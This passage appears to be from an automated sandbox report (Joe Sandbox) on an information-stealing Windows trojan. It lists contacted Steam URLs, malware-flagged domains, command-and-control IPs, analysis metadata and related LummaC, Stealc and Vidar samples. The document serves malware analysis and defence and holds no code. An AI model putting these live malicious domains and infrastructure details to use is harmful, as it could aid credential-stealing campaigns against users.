                                                                                                                                  https://www.youtube.com/86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://store.steampowered.com/privacy_agreement/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://post-to-me.com/track_prt.php?sub=AZCFTWko2q.exefalse
                                                                                                                                          		high
                                                                                                                                          https://wrathful-jammy.cyou/286DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          		unknown
                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.google.com/recaptcha/86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://checkout.steampowered.com/86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://post-to-me.com/AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://store.steampowered.com/;86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://store.steampowered.com/about/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://steamcommunity.com/my/wishlist/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://help.steampowered.com/en/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://steamcommunity.com/market/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://store.steampowered.com/news/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://store.steampowered.com/subscriber_agreement/86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://recaptcha.net/recaptcha/;86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://steamcommunity.com/discussions/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://store.steampowered.com/stats/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://medal.tv86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://broadcast.st.dl.eccdnx.com86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://store.steampowered.com/steam_refunds/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://steamcommunity.com/login/home/?goto=profiles%2F7656119972433190086DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=96201686DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://steamcommunity.com/workshop/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://login.steampowered.com/86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb86DC.tmp.exe, 00000003.00000003.1640001694.0000000000944000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://store.steampowered.com/legal/86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://post-to-me.com/DsAZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                https://recaptcha.net86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://upx.sf.netAmcache.hve.7.drfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://store.steampowered.com/86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://steamcommunity.com/profiles/76561199724331900_86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://127.0.0.1:2706086DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high

                                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            104.21.16.1
                                                                                                                                                                                                                            		deafeninggeh.bizUnited States
                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            104.21.56.70
                                                                                                                                                                                                                            		post-to-me.comUnited States
                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            23.55.153.106
                                                                                                                                                                                                                            		steamcommunity.comUnited States
                                                                                                                                                                                                                            		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                            176.113.115.19
                                                                                                                                                                                                                            		unknownRussian Federation
                                                                                                                                                                                                                            		49505SELECTELRUfalse
                                                                                                                                                                                                                            172.67.207.38
                                                                                                                                                                                                                            		immureprech.bizUnited States
                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                            General Information

                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                            Analysis ID:1575332
                                                                                                                                                                                                                            Start date and time:2024-12-15 09:19:19 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 8m 44s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:12
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                            Sample name:AZCFTWko2q.exe
                                                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                                                            Original Sample Name:7c13e0cbd1513abe7f2d2d73cc0ad615.exe
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.troj.evad.winEXE@4/7@11/5
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                            • Successful, ratio: 93%
                                                                                                                                                                                                                            • Number of executed functions: 41
                                                                                                                                                                                                                            • Number of non-executed functions: 336
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.168.117.173, 4.175.87.197, 20.190.147.5
                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                            03:20:23API Interceptor9110307x Sleep call for process: AZCFTWko2q.exe modified
                                                                                                                                                                                                                            03:20:29API Interceptor8x Sleep call for process: 86DC.tmp.exe modified
                                                                                                                                                                                                                            03:20:49API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                                            IPs

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            104.21.16.1JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                            • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                                                                                                                                                                                            104.21.56.70rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                    ief722WreR.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                      7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                        YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                          vwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                            Tg3sk2wywR.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                              x8AH98H0eQ.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                23.55.153.106YbJEkgZ4z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  3cb2b5U8BR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    afXf6ZiYTT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      ZideZBMwUQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        hKyD3sj3Y9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          P0w3gV5bH3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse

                                                                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                    immureprech.bizYbJEkgZ4z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    3cb2b5U8BR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    afXf6ZiYTT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    ZideZBMwUQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    hKyD3sj3Y9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    P0w3gV5bH3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    deafeninggeh.bizYbJEkgZ4z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.16.1
                                                                                                                                                                                                                                                                    3cb2b5U8BR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.32.1
                                                                                                                                                                                                                                                                    afXf6ZiYTT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.48.1
                                                                                                                                                                                                                                                                    ZideZBMwUQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.48.1
                                                                                                                                                                                                                                                                    hKyD3sj3Y9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.48.1
                                                                                                                                                                                                                                                                    P0w3gV5bH3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.64.1
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 104.21.80.1
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                    • 104.21.112.1
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 104.21.32.1
                                                                                                                                                                                                                                                                    post-to-me.comrHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                                                    XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                                                    EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                                                    ssB9bjDQPf.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                                                    ief722WreR.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    steamcommunity.comYbJEkgZ4z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    3cb2b5U8BR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    afXf6ZiYTT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    ZideZBMwUQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    hKyD3sj3Y9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    P0w3gV5bH3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 92.122.104.90

                                                                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                    AKAMAI-ASN1EUYbJEkgZ4z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    3cb2b5U8BR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    afXf6ZiYTT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    ZideZBMwUQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    hKyD3sj3Y9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    P0w3gV5bH3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    rebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                    • 23.215.60.12
                                                                                                                                                                                                                                                                    CLOUDFLARENETUSYbJEkgZ4z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    3cb2b5U8BR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    afXf6ZiYTT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    ZideZBMwUQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    hKyD3sj3Y9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    P0w3gV5bH3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.64.1
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 172.67.164.37
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
